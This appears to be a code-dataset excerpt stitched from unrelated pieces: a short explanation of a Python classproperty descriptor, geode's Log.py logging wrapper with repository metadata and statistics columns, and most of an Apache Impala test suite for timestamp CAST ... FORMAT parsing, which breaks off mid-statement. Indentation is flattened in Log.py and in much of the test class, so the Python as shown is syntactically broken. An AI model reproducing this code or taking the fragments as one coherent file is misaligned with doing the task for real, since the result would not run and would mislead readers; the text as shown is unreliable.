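`pretty_type` stacks `@classproperty` over `@classmethod`. The actual `classproperty` lives in `cyder.base.utils`, but one plausible minimal implementation of the descriptor looks like this:

```python
class classproperty(object):
    """Read-only property accessed on the class itself."""
    def __init__(self, fget):
        self.fget = fget  # expected to be a classmethod object

    def __get__(self, obj, owner):
        # Bind the wrapped classmethod to the owning class and call it.
        return self.fget.__get__(None, owner)()

class BaseModel(object):
    @classproperty
    @classmethod
    def pretty_type(cls):
        return cls.__name__.lower()

print(BaseModel.pretty_type)  # basemodel
```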
827e6541a3442082a9233c50bd7e4118c0694ec2 | 677 | py | Python | geode/utility/Log.py | jjqcat/geode | 157cc904c113cc5e29a1ffe7c091a83b8ec2cf8e | [
"BSD-3-Clause"
] | 75 | 2015-02-08T22:04:31.000Z | 2022-02-26T14:31:43.000Z | geode/utility/Log.py | bantamtools/geode | d906f1230b14953b68af63aeec2f7b0418d5fdfd | [
"BSD-3-Clause"
] | 15 | 2015-01-08T15:11:38.000Z | 2021-09-05T13:27:22.000Z | geode/utility/Log.py | bantamtools/geode | d906f1230b14953b68af63aeec2f7b0418d5fdfd | [
"BSD-3-Clause"
] | 22 | 2015-03-11T16:43:13.000Z | 2021-02-15T09:37:51.000Z | """log module"""
from __future__ import (with_statement,absolute_import)
from contextlib import contextmanager
import platform
if platform.system()=='Windows':
from ..import geode_all as geode_wrap
else:
from .. import geode_wrap
configure = geode_wrap.log_configure
initialized = geode_wrap.log_initialized
cache_initial_output = geode_wrap.log_cache_initial_output
copy_to_file = geode_wrap.log_copy_to_file
finish = geode_wrap.log_finish
write = geode_wrap.log_print
error = geode_wrap.log_error
flush = geode_wrap.log_flush
@contextmanager
def scope(format,*args):
geode_wrap.log_push_scope(format%args)
try:
yield
finally:
geode_wrap.log_pop_scope()
| 24.178571 | 58 | 0.806499 | 99 | 677 | 5.121212 | 0.414141 | 0.213018 | 0.236686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115214 | 677 | 27 | 59 | 25.074074 | 0.846411 | 0.014771 | 0 | 0 | 0 | 0 | 0.01059 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.227273 | 0 | 0.272727 | 0.045455 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8287f09e8a12d4ce01a483e2e0986ea088c6b9ee | 32,773 | py | Python | tests/query_test/test_cast_with_format.py | amansinha100/impala | e05a5323785ecb09e45bdb5dfc96533e68256175 | [
"Apache-2.0"
] | null | null | null | tests/query_test/test_cast_with_format.py | amansinha100/impala | e05a5323785ecb09e45bdb5dfc96533e68256175 | [
"Apache-2.0"
] | null | null | null | tests/query_test/test_cast_with_format.py | amansinha100/impala | e05a5323785ecb09e45bdb5dfc96533e68256175 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.test_dimensions import create_beeswax_hs2_dimension
class TestCastWithFormat(ImpalaTestSuite):
@classmethod
def get_workload(self):
return "functional-query"
  # Run the basic tests once for Beeswax and once for HS2. The underlying functionality
  # is independent of the file format, so it makes sense to pick one format for testing.
@classmethod
def add_test_dimensions(cls):
super(TestCastWithFormat, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'parquet')
cls.ImpalaTestMatrix.add_dimension(create_beeswax_hs2_dimension())
def test_basic_inputs_from_table(self, vector):
self.run_test_case('QueryTest/cast_format_from_table', vector)
def test_basic_inputs_without_row(self, vector):
# Cast without format clause to cover the default format
result = self.client.execute("select cast('2017-05-01 01:23:45.678912345' as "
"timestamp)")
assert result.data == ["2017-05-01 01:23:45.678912345"]
# Basic input to cover a datetime with timezone scenario
result = self.client.execute("select cast('2017-05-03 08:59:01.123456789PM 01:30'"
"as timestamp FORMAT 'YYYY-MM-DD HH12:MI:SS.FF9PM TZH:TZM')")
assert result.data == ["2017-05-03 20:59:01.123456789"]
# Input that contains shuffled date without time
result = self.client.execute("select cast('12-2010-05' as timestamp format "
"'DD-YYYY-MM')")
assert result.data == ["2010-05-12 00:00:00"]
# Shuffle the input timestamp and the format clause
result = self.client.execute("select cast('59 04-30-2017-05 01PM 01:08.123456789'"
"as timestamp FORMAT 'MI DD-TZM-YYYY-MM TZHPM SS:HH12.FF9')")
assert result.data == ["2017-05-04 20:59:01.123456789"]
# Input and format without separators
# Note, 12:01 HH12 AM is 00:01 with the internal 0-23 representation.
result = self.client.execute("select cast('20170501120159123456789AM-0130' as "
"timestamp FORMAT 'YYYYDDMMHH12MISSFFAMTZHTZM')")
assert result.data == ["2017-01-05 00:01:59.123456789"]
# Shuffled input without separators
result = self.client.execute("select cast('59043020170501PM0108123456789'"
"as timestamp FORMAT 'MIDDTZMYYYYMMTZHPMSSHH12FF9')")
assert result.data == ["2017-05-04 20:59:01.123456789"]
# Separator section lengths differ between input and format
result = self.client.execute("select cast('--2017----05-01-' as "
"timestamp FORMAT '-YYYY--MM---DD---')")
assert result.data == ["2017-05-01 00:00:00"]
# If the input string has unprocessed tokens
result = self.client.execute("select cast('2017-05-01 12:30' as "
"timestamp FORMAT 'YYYY-MM-DD')")
assert result.data == ["NULL"]
result = self.client.execute("select cast('2017-05-01-12:30' as "
"timestamp FORMAT 'YYYY-MM-DD-')")
assert result.data == ["NULL"]
# If the format string has unprocessed tokens
result = self.client.execute("select cast('2017-05-01' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI')")
assert result.data == ["NULL"]
result = self.client.execute("select cast('2017-05-01-' as "
"timestamp FORMAT 'YYYY-MM-DD-HH12')")
assert result.data == ["NULL"]
# Timestamp to string types formatting
result = self.client.execute(
"select cast(cast('2012-11-04 13:02:59.123456' as timestamp) "
"as string format 'DD-MM-YYYY MI:HH12:SS A.M. FF9 DDD SSSSS HH12 HH24')")
assert result.data == ["04-11-2012 02:01:59 P.M. 123456000 309 46979 01 13"]
result = self.client.execute(
"select cast(cast('2012-11-04 13:02:59.123456' as timestamp) "
"as varchar format 'DD-MM-YYYY MI:HH12:SS A.M. FF9 DDD SSSSS HH12 HH24')")
assert result.data == ["04-11-2012 02:01:59 P.M. 123456000 309 46979 01 13"]
result = self.client.execute(
"select cast(cast('2012-11-04 13:02:59.123456' as timestamp) "
"as char(50) format 'DD-MM-YYYY MI:HH12:SS A.M. FF9 DDD SSSSS HH12 HH24')")
assert result.data == ["04-11-2012 02:01:59 P.M. 123456000 309 46979 01 13"]
# Cast NULL string to timestamp
result = self.client.execute("select cast(cast(NULL as string) as timestamp "
"FORMAT 'YYYY-MM-DD')")
assert result.data == ["NULL"]
# Cast NULL timestamp to string
result = self.client.execute("select cast(cast(NULL as timestamp) as string "
"FORMAT 'YYYY-MM-DD')")
assert result.data == ["NULL"]
def test_iso8601_format(self):
# Basic string to timestamp scenario
result = self.client.execute("select cast('2018-11-10T15:11:04Z' as "
"timestamp FORMAT 'YYYY-MM-DDTHH24:MI:SSZ')")
assert result.data == ["2018-11-10 15:11:04"]
# ISO8601 format elements are case-insensitive
result = self.client.execute("select cast('2018-11-09t15:11:04Z' as "
"timestamp FORMAT 'YYYY-MM-DDTHH24:MI:SSz')")
assert result.data == ["2018-11-09 15:11:04"]
result = self.client.execute("select cast('2018-11-08T15:11:04z' as "
"timestamp FORMAT 'YYYY-MM-DDtHH24:MI:SSZ')")
assert result.data == ["2018-11-08 15:11:04"]
# Format path
result = self.client.execute("select cast(cast('2018-11-10 15:11:04' as "
"timestamp) as string format 'YYYY-MM-DDTHH24:MI:SSZ')")
assert result.data == ["2018-11-10T15:11:04Z"]
def test_lowercase_format_elements(self):
result = self.client.execute("select cast('2019-11-20 15:59:44.123456789 01:01' as "
"timestamp format 'yyyy-mm-dd hh24:mi:ss.ff9 tzh-tzm')")
assert result.data == ["2019-11-20 15:59:44.123456789"]
result = self.client.execute("select cast('2019-300 15:59:44.123456789 01:01' as "
"timestamp format 'yyyy-ddd hh24:mi:ss.ff9 tzh-tzm')")
assert result.data == ["2019-10-27 15:59:44.123456789"]
result = self.client.execute("select cast('2019-11-21 11:59:44.123456789 p.m. 01:01' "
"as timestamp format 'yyyy-mm-dd hh12:mi:ss.ff9 am tzh-tzm')")
assert result.data == ["2019-11-21 23:59:44.123456789"]
result = self.client.execute("select cast('2019-11-22 10000.123456789 02:02' "
"as timestamp format 'yyyy-mm-dd sssss ff9 tzh-tzm')")
assert result.data == ["2019-11-22 02:46:40.123456789"]
def test_year(self):
# Test lower boundary of year
result = self.client.execute("select cast('1399-05-01' as "
"timestamp FORMAT 'YYYY-MM-DD')")
assert result.data == ["NULL"]
# YYYY with less than 4 digits in the input
query_options = dict({'now_string': '2019-01-01 11:11:11'})
result = self.execute_query("select cast('095-01-31' as "
"timestamp FORMAT 'YYYY-MM-DD')", query_options)
assert result.data == ["2095-01-31 00:00:00"]
result = self.execute_query("select cast('95-02-28' as "
"timestamp FORMAT 'YYYY-MM-DD')", query_options)
assert result.data == ["2095-02-28 00:00:00"]
result = self.execute_query("select cast('5-03-31' as "
"timestamp FORMAT 'YYYY-MM-DD')", query_options)
assert result.data == ["2015-03-31 00:00:00"]
# YYY with less than 3 digits in the input
result = self.execute_query("select cast('95-04-30' as "
"timestamp FORMAT 'YYY-MM-DD')", query_options)
assert result.data == ["2095-04-30 00:00:00"]
result = self.execute_query("select cast('5-05-31' as "
"timestamp FORMAT 'YYY-MM-DD')", query_options)
assert result.data == ["2015-05-31 00:00:00"]
    # YY with 1 digit in the input
result = self.execute_query("select cast('5-06-30' as "
"timestamp FORMAT 'YY-MM-DD')", query_options)
assert result.data == ["2015-06-30 00:00:00"]
# YYY, YY, Y tokens without separators
result = self.execute_query("select cast('0950731' as "
"timestamp FORMAT 'YYYMMDD')", query_options)
assert result.data == ["2095-07-31 00:00:00"]
result = self.execute_query("select cast('950831' as "
"timestamp FORMAT 'YYMMDD')", query_options)
assert result.data == ["2095-08-31 00:00:00"]
result = self.execute_query("select cast('50930' as "
"timestamp FORMAT 'YMMDD')", query_options)
assert result.data == ["2015-09-30 00:00:00"]
# Timestamp to string formatting
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format 'YYYY')", query_options)
assert result.data == ["2019"]
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format 'YYY')", query_options)
assert result.data == ["019"]
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format 'YY')", query_options)
assert result.data == ["19"]
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format 'Y')", query_options)
assert result.data == ["9"]
def test_round_year(self):
query_options = dict({'now_string': '2019-01-01 11:11:11'})
    # Test lower boundary of round year
result = self.client.execute("select cast('1399-05-01' as "
"timestamp FORMAT 'RRRR-MM-DD')")
assert result.data == ["NULL"]
result = self.client.execute("select cast('1400-05-21' as "
"timestamp FORMAT 'RRRR-MM-DD')")
assert result.data == ["1400-05-21 00:00:00"]
# RRRR with 4-digit year falls back to YYYY
result = self.execute_query("select cast('2017-05-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["2017-05-31 00:00:00"]
# RRRR with 3-digit year fills digits from current year
result = self.execute_query("select cast('017-01-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["2017-01-31 00:00:00"]
    # RRRR with 1-digit year fills digits from current year
result = self.execute_query("select cast('0-07-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["2010-07-31 00:00:00"]
# RR with 1-digit year fills digits from current year
result = self.execute_query("select cast('9-08-31' as "
"timestamp FORMAT 'RR-MM-DD')", query_options)
assert result.data == ["2019-08-31 00:00:00"]
# Round year when last 2 digits of current year is less than 50
query_options = dict({'now_string': '2049-01-01 11:11:11'})
result = self.execute_query("select cast('49-03-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["2049-03-31 00:00:00"]
result = self.execute_query("select cast('50-03-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["1950-03-31 00:00:00"]
query_options = dict({'now_string': '2000-01-01 11:11:11'})
result = self.execute_query("select cast('49-03-31' as "
"timestamp FORMAT 'RR-MM-DD')", query_options)
assert result.data == ["2049-03-31 00:00:00"]
result = self.execute_query("select cast('50-03-31' as "
"timestamp FORMAT 'RR-MM-DD')", query_options)
assert result.data == ["1950-03-31 00:00:00"]
# Round year when last 2 digits of current year is greater than 49
query_options = dict({'now_string': '2050-01-01 11:11:11'})
result = self.execute_query("select cast('49-03-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["2149-03-31 00:00:00"]
result = self.execute_query("select cast('50-03-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["2050-03-31 00:00:00"]
query_options = dict({'now_string': '2099-01-01 11:11:11'})
result = self.execute_query("select cast('49-03-31' as "
"timestamp FORMAT 'RR-MM-DD')", query_options)
assert result.data == ["2149-03-31 00:00:00"]
result = self.execute_query("select cast('50-03-31' as "
"timestamp FORMAT 'RR-MM-DD')", query_options)
assert result.data == ["2050-03-31 00:00:00"]
    # In a datetime to string cast, round year acts like the regular 'YYYY' or 'YY' tokens.
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format 'RRRR')", query_options)
assert result.data == ["2019"]
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format 'RR')", query_options)
assert result.data == ["19"]
def test_day_in_year(self):
# Test "day in year" token in a non leap year scenario
result = self.execute_query("select cast('2019 1' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2019-01-01 00:00:00"]
result = self.execute_query("select cast('2019 31' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2019-01-31 00:00:00"]
result = self.execute_query("select cast('2019 32' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2019-02-01 00:00:00"]
result = self.execute_query("select cast('2019 60' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2019-03-01 00:00:00"]
result = self.execute_query("select cast('2019 365' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2019-12-31 00:00:00"]
result = self.execute_query("select cast('2019 366' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["NULL"]
# Test "day in year" token in a leap year scenario
result = self.execute_query("select cast('2000 60' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2000-02-29 00:00:00"]
result = self.execute_query("select cast('2000 61' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2000-03-01 00:00:00"]
result = self.execute_query("select cast('2000 366' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2000-12-31 00:00:00"]
result = self.execute_query("select cast('2000 367' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["NULL"]
# Test "day in year" token without separators
result = self.execute_query("select cast('20190011120' as timestamp "
"FORMAT 'YYYYDDDHH12MI')")
assert result.data == ["2019-01-01 11:20:00"]
# Timestamp to string formatting
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format'DDD')")
assert result.data == ["001"]
result = self.execute_query("select cast(cast('2019-12-31' as timestamp) as string "
"format'DDD')")
assert result.data == ["365"]
result = self.execute_query("select cast(cast('2000-12-31' as timestamp) as string "
"format'DDD')")
assert result.data == ["366"]
result = self.execute_query("select cast(cast('2019 123' as timestamp "
"format 'YYYY DDD') as string format'DDD')")
assert result.data == ["123"]
def test_second_of_day(self):
# Check boundaries
result = self.client.execute("select cast('2019-11-10 86399.11' as "
"timestamp FORMAT 'YYYY-MM-DD SSSSS.FF2')")
assert result.data == ["2019-11-10 23:59:59.110000000"]
result = self.client.execute("select cast('2019-11-10 0' as "
"timestamp FORMAT 'YYYY-MM-DD SSSSS')")
assert result.data == ["2019-11-10 00:00:00"]
    # Without separators, the full 5-digit "second of day" has to be given
result = self.client.execute("select cast('11-10 036612019' as "
"timestamp FORMAT 'MM-DD SSSSSYYYY')")
assert result.data == ["2019-11-10 01:01:01"]
# Check timezone offsets with "second of day"
result = self.client.execute("select cast('2019-11-10 036611010' as "
"timestamp FORMAT 'YYYY-MM-DD SSSSSTZHTZM')")
assert result.data == ["2019-11-10 01:01:01"]
# Timestamp to string formatting
result = self.client.execute("select cast(cast('2019-01-01 01:01:01' as timestamp) "
"as string format 'SSSSS')")
assert result.data == ["03661"]
result = self.client.execute("select cast(cast('2019-01-01' as timestamp) as string "
"format 'SSSSS')")
assert result.data == ["00000"]
result = self.client.execute("select cast(cast('2019-01-01 23:59:59' as timestamp) "
"as string format 'SSSSS')")
assert result.data == ["86399"]
def test_fraction_seconds(self):
result = self.execute_query("select cast('2019-11-08 123456789' as "
"timestamp FORMAT 'YYYY-MM-DD FF9')")
assert result.data == ["2019-11-08 00:00:00.123456789"]
result = self.execute_query("select cast('2019-11-08 1' as "
"timestamp FORMAT 'YYYY-MM-DD FF')")
assert result.data == ["2019-11-08 00:00:00.100000000"]
result = self.execute_query("select cast('2019-11-08 1234567890' as "
"timestamp FORMAT 'YYYY-MM-DD FF')")
assert result.data == ["NULL"]
result = self.execute_query("select cast('2019-11-08' as "
"timestamp FORMAT 'YYYY-MM-DD FF')")
assert result.data == ["NULL"]
self.run_fraction_test(1)
self.run_fraction_test(2)
self.run_fraction_test(3)
self.run_fraction_test(4)
self.run_fraction_test(5)
self.run_fraction_test(6)
self.run_fraction_test(7)
self.run_fraction_test(8)
self.run_fraction_test(9)
def run_fraction_test(self, length):
MAX_LENGTH = 9
fraction_part = ""
for x in range(length):
fraction_part += str(x + 1)
template_input = "select cast('2019-11-08 %s' as timestamp FORMAT 'YYYY-MM-DD FF%s')"
input_str = template_input % (fraction_part, length)
expected = "2019-11-08 00:00:00." + fraction_part + ("0" * (MAX_LENGTH - length))
result = self.execute_query(input_str)
assert result.data == [expected]
input2_str = template_input % (fraction_part + str(length + 1), length)
result = self.execute_query(input2_str)
assert result.data == ["NULL"]
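run_fraction_test expects an FF<n> value to be right-padded with zeros out to nanosecond (9-digit) precision. The padding rule in isolation (helper name illustrative):

```python
MAX_LENGTH = 9  # nanosecond precision

def pad_fraction(fraction_part):
    # '123' parsed with FF3 becomes .123000000 in the formatted timestamp.
    return fraction_part + '0' * (MAX_LENGTH - len(fraction_part))

print(pad_fraction('123'))        # 123000000
print(pad_fraction('123456789'))  # 123456789
```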
def test_meridiem_indicator(self):
# Check 12 hour diff between AM and PM
result = self.client.execute("select cast('2017-05-03 08 AM' as "
"timestamp FORMAT 'YYYY-MM-DD HH12 AM')")
assert result.data == ["2017-05-03 08:00:00"]
result = self.client.execute("select cast('2017-05-04 08 PM' as "
"timestamp FORMAT 'YYYY-MM-DD HH12 PM')")
assert result.data == ["2017-05-04 20:00:00"]
# Check that any meridiem indicator in the pattern matches any meridiem indicator in
# the input
result = self.client.execute("select cast('2017-05-05 12AM' as "
"timestamp FORMAT 'YYYY-MM-DD HH12PM')")
assert result.data == ["2017-05-05 00:00:00"]
result = self.client.execute("select cast('2017-05-06 P.M.12' as "
"timestamp FORMAT 'YYYY-MM-DD AMHH12')")
assert result.data == ["2017-05-06 12:00:00"]
result = self.client.execute("select cast('2017-05-07 PM 01' as "
"timestamp FORMAT 'YYYY-MM-DD A.M. HH12')")
assert result.data == ["2017-05-07 13:00:00"]
# Test lowercase indicator in input
result = self.client.execute("select cast('2017-05-08 pm09' as "
"timestamp FORMAT 'YYYY-MM-DD P.M.HH12')")
assert result.data == ["2017-05-08 21:00:00"]
result = self.client.execute("select cast('2017-05-09 10a.m.' as "
"timestamp FORMAT 'YYYY-MM-DD HH12PM')")
assert result.data == ["2017-05-09 10:00:00"]
# Test that '.' in indicator doesn't conflict with '.' as separator
result = self.client.execute("select cast('2017-05-11 9.AM.10' as "
"timestamp FORMAT 'YYYY-MM-DD HH12.P.M..MI')")
assert result.data == ["2017-05-11 09:10:00"]
result = self.client.execute("select cast('2017-05-10.P.M..10' as "
"timestamp FORMAT 'YYYY-MM-DD.AM.HH12')")
assert result.data == ["2017-05-10 22:00:00"]
# Timestamp to string formatting
result = self.client.execute("select cast(cast('2019-01-01 00:15:10' as timestamp) "
"as string format 'HH12 P.M.')")
assert result.data == ["12 A.M."]
result = self.client.execute("select cast(cast('2019-01-01 12:15:10' as timestamp) "
"as string format 'HH12 AM')")
assert result.data == ["12 PM"]
result = self.client.execute("select cast(cast('2019-01-01 13:15:10' as timestamp) "
"as string format 'HH12 a.m.')")
assert result.data == ["01 p.m."]
result = self.client.execute("select cast(cast('2019-01-01 23:15:10' as timestamp) "
"as string format 'HH12 p.m.')")
assert result.data == ["11 p.m."]
def test_timezone_offsets(self):
# Test positive timezone offset.
result = self.client.execute("select cast('2018-01-01 10:00 AM +15:59' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M. TZH:TZM')")
assert result.data == ["2018-01-01 10:00:00"]
# Test negative timezone offset.
result = self.client.execute("select cast('2018-12-31 08:00 PM -15:59' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M. TZH:TZM')")
assert result.data == ["2018-12-31 20:00:00"]
# Minus sign before TZM.
result = self.client.execute("select cast('2018-12-31 08:00 AM 01:-59' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M. TZH:TZM')")
assert result.data == ["2018-12-31 08:00:00"]
# Minus sign right before one digit TZH.
result = self.client.execute("select cast('2018-12-31 08:00 AM--1:10' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M. TZH:TZM')")
assert result.data == ["2018-12-31 08:00:00"]
result = self.client.execute("select cast('2018-12-31 08:00 AM-5:00' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M.TZH:TZM')")
assert result.data == ["2018-12-31 08:00:00"]
# One digit negative TZH at the end of the input string.
result = self.client.execute("select cast('2018-12-31 12:01 -1' as timestamp "
"FORMAT 'YYYY-MM-DD HH24:MI TZH')")
assert result.data == ["2018-12-31 12:01:00"]
# Test timezone offset parsing without separators
result = self.client.execute("select cast('201812310800AM+0515' as "
"timestamp FORMAT 'YYYYMMDDHH12MIA.M.TZHTZM')")
assert result.data == ["2018-12-31 08:00:00"]
result = self.client.execute("select cast('201812310800AM0515' as "
"timestamp FORMAT 'YYYYMMDDHH12MIA.M.TZHTZM')")
assert result.data == ["2018-12-31 08:00:00"]
result = self.client.execute("select cast('201812310800AM-0515' as "
"timestamp FORMAT 'YYYYMMDDHH12MIA.M.TZHTZM')")
assert result.data == ["2018-12-31 08:00:00"]
# Test signed zero TZH with not null TZM
result = self.client.execute("select cast('2018-01-01 10:00 AM +00:59' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M. TZH:TZM')")
assert result.data == ["2018-01-01 10:00:00"]
result = self.client.execute("select cast('2018-01-01 10:00 AM -00:59' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M. TZH:TZM')")
assert result.data == ["2018-01-01 10:00:00"]
# Shuffle TZH and TZM into other elements
result = self.client.execute("select cast('2018-01-01 15 10:00 1 AM' as "
"timestamp FORMAT 'YYYY-MM-DD TZM HH12:MI TZH A.M.')")
assert result.data == ["2018-01-01 10:00:00"]
result = self.client.execute("select cast('2018-01-011510:00-01AM' as "
"timestamp FORMAT 'YYYY-MM-DDTZMHH12:MITZHA.M.')")
assert result.data == ["2018-01-01 10:00:00"]
# Timezone offset with default time
result = self.client.execute("select cast('2018-01-01 01:30' as timestamp "
"FORMAT 'YYYY-MM-DD TZH:TZM')")
assert result.data == ["2018-01-01 00:00:00"]
# Single minus sign before two digit TZH.
result = self.client.execute("select cast('2018-09-11 15:30:10-10' as timestamp "
"FORMAT 'YYYY-MM-DD HH24:MI:SS-TZH')")
assert result.data == ["2018-09-11 15:30:10"]
# Non-digit TZH and TZM.
result = self.client.execute("select cast('2018-09-11 17:30:10 ab:10' as timestamp "
"FORMAT 'YYYY-MM-DD HH24:MI:SS TZH:TZM')")
assert result.data == ["NULL"]
result = self.client.execute("select cast('2018-09-11 17:30:10 -ab:10' as timestamp "
"FORMAT 'YYYY-MM-DD HH24:MI:SS TZH:TZM')")
assert result.data == ["NULL"]
result = self.client.execute("select cast('2018-09-11 17:30:10 +ab:10' as timestamp "
"FORMAT 'YYYY-MM-DD HH24:MI:SS TZH:TZM')")
assert result.data == ["NULL"]
result = self.client.execute("select cast('2018-09-11 18:30:10 10:ab' as timestamp "
"FORMAT 'YYYY-MM-DD HH24:MI:SS TZH:TZM')")
assert result.data == ["NULL"]
def test_format_parse_errors(self):
# Invalid format
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'XXXX-dd-MM')")
assert "Bad date/time conversion format: XXXX-dd-MM" in str(err)
# Invalid use of SimpleDateFormat
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01 15:10' as timestamp format 'yyyy-MM-dd +hh:mm')")
assert "Bad date/time conversion format: yyyy-MM-dd +hh:mm" in str(err)
# Duplicate format element
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD MM')")
assert "Invalid duplication of format element" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD-YYYY')")
assert "Invalid duplication of format element" in str(err)
# Multiple year token provided
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD-YY')")
assert "Multiple year token provided" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYY-MM-DD-Y')")
assert "Multiple year token provided" in str(err)
# Year and round year conflict
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YY-MM-DD-RRRR')")
assert "Both year and round year are provided" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'RR-MM-DD-YYY')")
assert "Both year and round year are provided" in str(err)
# Day of year conflict
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DDD')")
assert "Day of year provided with day or month token" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-DD-DDD')")
assert "Day of year provided with day or month token" in str(err)
# Conflict between hour tokens
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD HH:HH24')")
assert "Multiple hour tokens provided" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD HH12:HH24')")
assert "Multiple hour tokens provided" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD HH12:HH')")
assert "Multiple hour tokens provided" in str(err)
# Conflict with median indicator
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD AM HH:MI A.M.')")
assert "Multiple median indicator tokens provided" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD PM HH:MI am')")
assert "Multiple median indicator tokens provided" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD HH24:MI a.m.')")
assert "Conflict between median indicator and hour token" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD p.m.')")
assert "Missing hour token" in str(err)
# Conflict with second of day
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD SSSSS HH')")
assert "Second of day token conflicts with other token(s)" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD HH12:SSSSS')")
assert "Second of day token conflicts with other token(s)" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD HH24SSSSS')")
assert "Second of day token conflicts with other token(s)" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD MI SSSSS')")
assert "Second of day token conflicts with other token(s)" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD SS SSSSS')")
assert "Second of day token conflicts with other token(s)" in str(err)
# Too long format
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format '" +
"{char: <101}".format(char="s") + "')")
assert "The input format is too long" in str(err)
# Timezone offsets in a datetime to string formatting
err = self.execute_query_expect_failure(self.client,
"select cast(cast('2017-05-01 01:15' as timestamp format 'YYYY-MM-DD TZH:TZM') "
"as string format 'TZH')")
assert "Timezone offset not allowed in a datetime to string conversion" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast(cast('2017-05-01 01:15' as timestamp format 'YYYY-MM-DD TZH:TZM') "
"as string format 'TZM')")
assert "Timezone offset not allowed in a datetime to string conversion" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast(cast('2017-05-01 01:15' as timestamp format 'YYYY-MM-DD TZH:TZM') "
